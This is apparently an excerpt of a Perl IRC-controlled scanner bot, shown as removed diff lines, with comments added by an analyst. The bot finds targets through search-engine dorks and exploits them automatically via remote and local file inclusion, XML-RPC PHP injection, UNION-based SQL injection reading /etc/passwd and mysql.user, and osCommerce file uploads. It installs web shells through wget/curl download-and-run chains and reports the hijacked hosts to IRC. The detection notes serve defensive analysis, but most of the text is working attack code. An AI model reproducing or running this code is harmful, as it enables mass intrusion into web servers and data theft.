- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"ExaLead",$type);
- } exit; }
- }
- if ($engine =~ /lycos/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"LyCos",$type);
- } exit; }
- }
- if ($engine =~ /hotbot/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"HotBot",$type);
- } exit; }
- }
- if ($engine =~ /aol/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"AoL",$type);
- } exit; }
- }
- if ($engine =~ /sapo/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"SaPo",$type);
- } exit; }
- }
- if ($engine =~ /duck/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"DuCk",$type);
- } exit; }
- }
- if ($engine =~ /lygo/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"LyGo",$type);
- } exit; }
- }
- if ($engine =~ /yause/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"YauSe",$type);
- } exit; }
- }
- if ($engine =~ /baidu/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"BaiDu",$type);
- } exit; }
- }
- if ($engine =~ /kipot/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"KiPoT",$type);
- } exit; }
- }
- if ($engine =~ /gibla/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"GiBLa",$type);
- } exit; }
- }
- if ($engine =~ /black/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"BLacK",$type);
- } exit; }
- }
- if ($engine =~ /onet/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"oNeT",$type);
- } exit; }
- }
- if ($engine =~ /sizuka/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"SiZuka",$type);
- } exit; }
- }
- if ($engine =~ /walla/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"WaLLa",$type);
- } exit; }
- }
- if ($engine =~ /demos/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"DeMos",$type);
- } exit; }
- }
- if ($engine =~ /rose/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"RoSe",$type);
- } exit; }
- }
- if ($engine =~ /seznam/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"SeZnaM",$type);
- } exit; }
- }
- if ($engine =~ /tiscali/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"TisCali",$type);
- } exit; }
- }
- if ($engine =~ /naver/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"NaVeR",$type);
- } exit; }
- }
- }
- #########################################
- sub rfi() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$rfilogo(4@9$engine15)10 Scan finish"); }
- my $coba = "http://".$site.$bug."test??";
- my $test = "http://".$site.$bug.$injector."??";
- my $dor = "http://".$site.$bug.$botshell."??";
- my $dor2 = "http://".$site.$bug.$botshell2."??";
- my $cek = &get_content($coba);sleep(1);
- &get_content($dor);sleep(1);
- &get_content($dor2);sleep(1);
- if ($cek =~ /failed to open stream/i) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- &rfi_xpl($test,$chan,$site);
- exit;}
- }
- }
- }
- }
- }
- sub rfi_xpl() {
- my $url = $_[0];
- my $chan = $_[1];
- my $site = $_[2];
- my $dor = $url.$botshell."??";
- my $dor2 = $url.$botshell2."??";
- my $test = $url.$injector."??";
- my $vuln = $url."14(ByroeNet)";
- my $check = &get_content($test);
- &get_content($dor);sleep(1);
- &get_content($dor2);sleep(1);
- if ( $check =~ /JANCOK- exploit/i ) {
- my $safe ="";
- my $os ="";
- my $free ="";
- if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
- if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
- if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
- if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
- &msg("$chan","$rfilogo(4@9VuLn15)13 ".$vuln."9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)(4@9safemode-off15)");
- &msg("$admin","$rfilogo(4@9VuLn15)13 ".$vuln."9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");
- }
- else {&msg("$chan","$rfilogo(4@9VuLn15)10 ".$vuln." (4@7safemode-on15)");}
- }
- sub lfi() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$lfilogo(4@9$engine15)10 Scan finish"); }
- my $dir = "../../../../../../../../../../../../../";
- my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
- my $vuln = "http://".$site."12".$bug.$dir."/proc/self/environ%0000";
- my $shell = "http://".$site."12".$bug.$dir."/tmp/ipays%0000";
- my $html = &get_content($test);
- if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $code = 'echo "c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.$injector.'","/tmp/ipays")) { echo "SUCCESS";@copy("'.$botshell.'","/tmp/dev");@copy("'.$botshell2.'","/tmp/maza"); }';
- my $res = lfi_env_query($test,encode_base64($code));
- &lfi_spread_query($test);
- &get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);
- &get_content("http://".$site.$bug.$dir."/tmp/maza%0000");
- $res =~ s/\n//g;
- if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {
- my $sys = $1;
- $nob0dy = $2;
- &msg("$chan","$lfilogo(4@8$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@9".$sys."15))15(4@9$nob0dy15)");sleep(2);
- }
- elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $sys = $1;
- $nob0dy = $2;
- my $upload = 'system("killall -9 perl;killall -9 php;wget '.$injector.' -O aspaltx.php;fetch '.$injector.';mv ipays.jpg aspaltx.php;wget '.$botshell.' -O byroe.php;fetch '.$botshell.';mv byroe.jpg byroe.php;wget '.$botshell2.' -O allnet.php;fetch '.$botshell2.';mv allnet.jpg allnet.php;");passthru("killall -9 perl;killall -9 php;wget '.$injector.' -O aspaltx.php;fetch '.$injector.';mv ipays.jpg aspaltx.php;wget '.$botshell.' -O byroe.php;fetch '.$botshell.';mv byroe.jpg byroe.php;wget '.$botshell2.' -O allnet.php;fetch '.$botshell2.';mv allnet.jpg allnet.php;");';
- my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
- my $check = &get_content("http://".$site.$bug.$dir."/tmp/ipays%0000"); sleep(2);
- &get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);
- &get_content("http://".$site.$bug.$dir."/tmp/maza%0000");sleep(2);
- if ($check =~ /JANCOK- exploit/) {
- &msg("$chan","$lfilogo(4@8$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
- &msg("$admin","$lfilogo(4@8$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
- }
- else {
- &msg("$chan","$lfilogo(4@8$engine15)15(4@9SysTem15)7 ".$vuln." 15(4@3".$sys."15))15(4@9$nob0dy15)");sleep(2);
- }
- } exit; }
- }
- else { &msg("$chan","$lfilogo(4@8$engine15)15(4@9EnviRon15)10 ".$vuln); }
- } exit; } sleep(2);
- }
- }
- }
- }
- sub lfi_env_query() { # Issue one GET to $url with a crafted User-Agent and return the response body. Arguments: URL, base64 text that is placed inside the header.
- my $url = $_[0];
- my $code = $_[1]; # callers pass encode_base64() output
- my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".$code."'));?>"); # detection: a User-Agent beginning with "<?" or containing "base64_decode(" is never a real browser; alert on it in access and WAF logs, especially on requests whose path contains proc/self/environ
- $ua->timeout(7); # 7-second request timeout
- my $req = HTTP::Request->new(GET => $url);
- my $res = $ua->request($req);
- return $res->content; # body is returned whether or not the request succeeded; callers pattern-match on it
- }
# lfi_spread_query($url): same delivery as lfi_env_query() (a PHP
# eval(base64_decode()) stub in the User-Agent of a single GET), with a fixed
# payload built here from $botshell and $botshell2.
# The payload is one PHP system() call that works in /tmp and then /var/tmp:
# it tries fetch, wget, curl -O and lwp-download in turn, runs each download
# with the php command line and deletes it afterwards.
# There is no explicit return and $res is not examined.
# Analyst note: byroe.jpg / allnet.jpg appearing in /tmp or /var/tmp, and php
# processes started on those files, are host-side indicators; the
# User-Agent pattern is the network-side one.
- sub lfi_spread_query() {
- my $url = $_[0];
- my $code = "system('cd /tmp;rm -rf allnet.* *.jpg.*;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;cd /var/tmp;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;rm -rf *.jp*;');";
- my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".encode_base64($code)."'));?>");
- $ua->timeout(7);
- my $req = HTTP::Request->new(GET => $url);
- my $res = $ua->request($req);
- }
# xml($chan, $bug, $dork, $engine): XML-RPC scan driver.
#   $chan   - IRC channel that receives status lines via msg()
#   $bug    - path appended to every candidate host
#   $dork   - search query handed to search_engine()
#   $engine - search engine name, also shown in the status lines
# For each host from search_engine() it fetches http://<host><bug>; a body
# containing "faultCode" is treated as an XML-RPC endpoint. It then calls
# xml_cek_query(), and if the reply carries the j13mb0t...j13mb0t marker it
# calls xml_spread_query() and requests aspaltx.php, byroe.php and allnet.php
# on the host. "JANCOK- exploit" in the aspaltx.php body is reported as a
# shell; otherwise only the captured system string is reported.
# The digit runs inside the message strings look like IRC colour codes whose
# control bytes were lost in the paste (presumably; as printed, "$engine15"
# would parse as a different variable).
# Analyst note: files named aspaltx.php, byroe.php or allnet.php next to an
# XML-RPC endpoint are the artefacts this routine checks for.
- sub xml() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$xmllogo(4@8$engine15)10 Scan finish"); }
- my $test = "http://".$site.$bug;
- my $vuln = "http://".$site."13".$bug;
- my $html = &get_content($test);
- if ($html =~ /faultCode/ ) {
# Double fork: the parent waits only for the first child, which exits at
# once; the grandchild does the work below and then exits.
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $resp = &xml_cek_query($test);
- if ($resp =~ /j13mb0t(.*)j13mb0t/s) {
- &xml_spread_query($test);sleep(2);
- my $sys = $1;
- my $check = &get_content("http://".$site."aspaltx.php");
- &get_content("http://".$site."byroe.php");
- &get_content("http://".$site."allnet.php");
- if ($check =~ /JANCOK- exploit/) {
- &msg("$chan","$xmllogo(4@8$engine15)15(13@9SheLL15)13 http://".$site."7aspaltx.php 3".$sys);&get_content("http://".$site."byroe.php"); sleep(2);}
- else {
- &msg("$chan","$xmllogo(4@8$engine15)15(4@9SysTem15)7 ".$vuln." 3".$sys); sleep(2);}
- }
- sleep(2); } exit; } }
- }
- }
- }
# xml_cek_query($url): POST an XML-RPC methodCall to $url and return the
# response body.
# The <name> value closes a quoted string and appends PHP that echoes the
# marker 'j13mb0t', runs system('uname -a'), echoes the marker again and
# exits, so a caller can cut the command output out of the reply.
# $exploit is not declared with my, so it is a package global.
# Analyst note: text/xml POSTs with User-Agent "perl post", methodName
# "test.method" and a <name> value beginning with "',''));" are what this
# probe looks like in request logs or a WAF.
- sub xml_cek_query() {
- my $url = $_[0];
- my $code = "system('uname -a');";
- my $ua = LWP::UserAgent->new(agent => 'perl post');
- $exploit = "<?xml version=\"1.0\"?><methodCall>";
- $exploit .= "<methodName>test.method</methodName>";
- $exploit .= "<params><param><value><name>',''));";
- $exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";
- $ua->timeout(7);
- my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
- return $res->content;
- }
# xml_spread_query($xmltargt): POST the same XML-RPC methodCall shape as
# xml_cek_query(), carrying a download-and-run payload instead of uname.
# The payload is one PHP system() call that saves $injector, $botshell and
# $botshell2 as aspaltx.php, byroe.php and allnet.php in the current
# directory, runs "killall -9" on perl and php, then repeats the
# fetch/wget/curl/lwp-download sequence in /tmp and /var/tmp, running each
# download with the php command line.
# The markers here are 'j13m' and 'b0T'; the response is discarded.
# Analyst note: besides the dropped file names, the "killall -9 perl" /
# "killall -9 php" step means unexplained loss of other perl/php processes
# on the host can accompany a successful run.
- sub xml_spread_query() {
- my $xmltargt = $_[0];
- my $xmlsprd = "system('wget ".$injector." -O aspaltx.php;fetch ".$injector.";mv ipays.jpg aspaltx.php;wget ".$botshell." -O byroe.php;fetch ".$botshell.";mv byroe.jpg byroe.php;wget ".$botshell2." -O allnet.php;fetch ".$botshell2.";mv allnet.jpg allnet.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;');";
- my $userAgent = LWP::UserAgent->new(agent => 'perl post');
- $exploit = "<?xml version=\"1.0\"?><methodCall>";
- $exploit .= "<methodName>test.method</methodName>";
- $exploit .= "<params><param><value><name>',''));";
- $exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*</name></value></param></params></methodCall>";
- $userAgent->timeout(7);
- $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
- }
# sql($chan, $bug, $dork, $engine): SQL-error scan driver.
# For each host from search_engine() it requests http://<host><bug> with a
# single quote appended and classifies the reply by database error text:
# MySQL-style messages go to sqlbrute(); MS SQL Server and
# Access/JET/Oracle-provider messages are only reported to $chan.
# The page is fetched before the fork; the classification runs in the
# grandchild of a double fork (parent waits for the first child, which
# exits at once).
# Analyst note: the error strings matched here are the ones an application
# should never return to a client; suppressing verbose database errors
# removes the signal this scanner keys on, though not the underlying flaw.
- sub sql() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$sqllogo(4@8$engine15)10 Scan finish"); }
- my $test = "http://".$site.$bug."'";
- my $vuln = "http://".$site."4".$bug;
- my $sqlsite = "http://".$site.$bug;
- my $html = &get_content($test);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
- &sqlbrute($sqlsite,$chan,$engine);}
- elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
- &msg("$chan","$sqllogo(4@8$engine15)15(4@9MsSQL15)13 ".$vuln);}
- elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
- &msg("$chan","$sqllogo(4@8$engine15)15(4@9MsAccess15)13 ".$vuln);}
- elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
- &sqlbrute($sqlsite,$chan,$engine);}
- } exit; sleep(2); }
- }
- }
- }
# sqlbrute($situs, $chan, $engine): UNION-based column-count probe against
# the URL $situs; every request URL that answers is posted to $chan.
# For 1 to 20 columns it requests "-1+union+select+<marker>,..." where the
# marker is 0x6c6f67696e70776e7a (hex for "loginpwnz") and looks for that
# text in the response. On a hit it repeats the probe against
# information_schema.tables and mysql.user, requests
# load_file(0x2f6574632f706173737764) (hex for "/etc/passwd") and checks the
# reply for "root:x:", then walks the table names in @tabele and calls
# tabelka() for each table that answers.
# $column, $union, $inyection, $sql, $response, $loadfile and $loadcont are
# not declared with my, so they are package globals ($inyection is read again
# by tabelka()). @tabele is defined outside this part of the file.
# get() is LWP::Simple's; each "or die" ends the calling process when a
# request returns nothing.
# Analyst note: request URLs containing 0x6c6f67696e70776e7a or
# load_file(0x2f6574632f706173737764) are fixed strings to search web server
# and WAF logs for.
- sub sqlbrute() {
- my $situs=$_[0];
- my $chan =$_[1];
- my $engine=$_[2];
- my $columns=20;
- my $cfin.="--";
- my $cmn.= "+";
- for ($column = 0 ; $column < $columns ; $column ++)
- {
- $union.=','.$column;
- $inyection.=','."0x6c6f67696e70776e7a";
- if ($column == 0)
- {
- $inyection = '';
- $union = '';
- }
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
- $response=get($sql);
- if($response =~ /loginpwnz/)
- {
- $column ++;
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
- &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)13 $sql ");
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
- $response=get($sql)or die("[-] Impossible to get Information_Schema\n");
- if($response =~ /loginpwnz/)
- {
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
- &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13INFO_SCHEMA15)13 $sql ");
- }
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
- $response=get($sql)or die("[-] Impossible to get MySQL.User\n");
- if($response =~ /loginpwnz/)
- {
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
- &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13USER15)13 $sql ");
- }
- else
- {
- }
- while ($loadcont < $column-1)
- {
- $loadfile.=','.'load_file(0x2f6574632f706173737764)';
- $loadcont++;
- }
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
- $response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
- if($response =~ /root:x:/)
- {
- &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13Load File15)13 $sql ");
- }
- else
- {
- }
- foreach $tabla(@tabele)
- {
- chomp($tabla);
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
- $response=get($sql)or die("[-] Impossible to get tables\n");
- if($response =~ /loginpwnz/)
- {
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
- &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13Tabel15)13 $sql ");
- &tabelka($situs,$tabla,$chan,$engine);
- }
- }
- }
- }
- }
# tabelka($situs, $tabla, $chan, $engine): column-name probe for one table.
# For each name in @kolumny (defined outside this part of the file) it
# requests a UNION SELECT of concat(<marker>,0x3a,<column>) from $tabla and
# reports the site, column and table to $chan when the marker text
# "loginpwnz" comes back.
# $inyection is the package global left behind by sqlbrute(); $columna, $sql
# and $response are package globals as well. "or die" ends the process when
# a request returns nothing.
# Analyst note: the concat(0x6c6f67696e70776e7a,0x3a, prefix in a query
# string identifies this stage in request logs.
- sub tabelka() {
- my $situs =$_[0];
- my $tabla =$_[1];
- my $chan =$_[2];
- my $engine=$_[3];
- my $cfin.="--";
- my $cmn.= "+";
- chomp($tabla);
- foreach $columna(@kolumny)
- {
- chomp($columna);
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
- $response=get($sql)or die("[-] Impossible to get columns\n");
- if ($response =~ /loginpwnz/)
- {
- &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13SQLi Vuln15)9 $situs 14(4@13Kolom14)13 $columna 14(4@13Tabel14)13 $tabla ");
- }
- }
- }
# osco($chan, $bug, $dork, $engine): upload-form scan driver (the OSCO label
# presumably refers to osCommerce; the code does not say).
# For each host from search_engine() it fetches http://<host><bug> and, in
# the grandchild of a double fork, calls osco_xpl() when the body contains
# "Warning: No file uploaded", i.e. when an upload handler answered the
# request.
# Analyst note: an upload handler that answers this way to a request carrying
# no session is the exposure being detected; the handler should require
# authentication before it processes anything.
- sub osco() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$oscologo(4@8$engine15)10 Scan finish"); }
- my $test = "http://".$site.$bug;
- my $html = &get_content($test);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($html =~ /Warning: No file uploaded/ ) {
- # &msg("$chan","$oscologo(4@8$engine15)15(4@9System15)7 ".$test);
- &osco_xpl($test,$chan,$site,$engine);
- } else { }
- } exit; sleep(2); }
- }
- }
- }
# osco_xpl($url, $chan, $site, $engine): post four form-data uploads to $url
# in the field products_image, then check whether the result is reachable.
# Local files ./ipays.jpg, ./maza.jpg, ./byroe.jpg and ./allnet.jpg are sent
# under the names bronsx.php, aspaltx.php, byroe.php and allnet.html.
# It then requests images/aspaltx.php, images/byroe.php and
# images/allnet.html on $site; when the first body contains
# "JANCOK- exploit" it scrapes the Software, SAFE MODE, OS and Freespace
# fields from that page and reports them to $chan and to $admin.
# The four as_string results are stored and not used; $soft is a package
# global (no my).
# Analyst note: bronsx.php, aspaltx.php, byroe.php or allnet.html inside a
# shop's images/ directory are the artefacts of this routine. Denying script
# execution in upload directories and checking the stored file name's
# extension are the relevant controls.
- sub osco_xpl() {
- my $browser = LWP::UserAgent->new;
- my $url = $_[0];
- my $chan = $_[1];
- my $site = $_[2];
- my $engine = $_[3];
- my $res = $browser->post( $url,['products_image' => ['./ipays.jpg' => 'bronsx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
- my $resa = $browser->post( $url,['products_image' => ['./maza.jpg' => 'aspaltx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
- my $resb = $browser->post( $url,['products_image' => ['./byroe.jpg' => 'byroe.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
- my $resc = $browser->post( $url,['products_image' => ['./allnet.jpg' => 'allnet.html' => 'application/octet-stream']],'Content-Type' => 'form-data');
- my $hasil = $res->as_string;
- my $hasil1 = $resa->as_string;
- my $hasil2 = $resb->as_string;
- my $hasil3 = $resc->as_string;
- my $check = &get_content("http://".$site."images/aspaltx.php");&get_content("http://".$site."images/byroe.php");&get_content("http://".$site."images/allnet.html");sleep(3);
- if ($check =~ /JANCOK- exploit/) {
- my $safe ="";
- my $os ="";
- my $free ="";
- if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
- if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
- if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
- if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
- &msg("$chan","$oscologo(4@8$engine15)15(4@9SHeLL15)13 http://".$site."images/4aspaltx.php 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
- &msg("$admin","$oscologo(4@8$engine15)15(4@9SHeLL15)13 http://".$site."images/4allnet.html 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
- }
- }
# osco2($chan, $bug, $dork, $engine): second upload-form scan driver.
# Same flow as osco(): fetch http://<host><bug> for every host from
# search_engine(), and in the grandchild of a double fork call osco_xpl2()
# when the body contains "TABLE_HEADING_FILENAME" (it looks like an
# untranslated language constant, so presumably a file-manager page rendered
# without its language file).
# Analyst note: a page that shows raw constant names to an anonymous client
# is being served without its normal bootstrap, and with it, presumably,
# without its login check.
- sub osco2() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$oscologo(4@8$engine15)10 Scan finish"); }
- my $test = "http://".$site.$bug;
- my $html = &get_content($test);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($html =~ /TABLE_HEADING_FILENAME/ ) {
- # &msg("$chan","$oscologo(4@8$engine15)15(4@9System15)7 ".$test);
- &osco_xpl2($test,$chan,$site,$engine);
- } else { }
- } exit; sleep(2); }
- }
- }
- }
# osco_xpl2($url, $chan, $site, $engine): variant of osco_xpl() that posts to
# $url with "?action=processuploads" appended and uses the form field file_1.
# The same four local files are sent under the names bronsx.php,
# aspaltx.php, byroe.php and allnet.html, and the same three images/ URLs
# are requested afterwards. The success test in this variant is the string
# "JANCOK- exploits"; on a match the Software, SAFE MODE, OS and Freespace
# fields are scraped and reported to $chan and $admin.
# The four as_string results are stored and not used; $soft is a package
# global (no my).
# Analyst note: POSTs to a URL ending in "?action=processuploads" from a
# client with no admin session, followed by GETs for images/aspaltx.php,
# are the log pattern of this routine.
- sub osco_xpl2() {
- my $browser = LWP::UserAgent->new;
- my $url = $_[0]."?action=processuploads";
- my $chan = $_[1];
- my $site = $_[2];
- my $engine = $_[3];
- my $res = $browser->post( $url,['file_1' => ['./ipays.jpg' => 'bronsx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
- my $resa = $browser->post( $url,['file_1' => ['./maza.jpg' => 'aspaltx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
- my $resb = $browser->post( $url,['file_1' => ['./byroe.jpg' => 'byroe.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
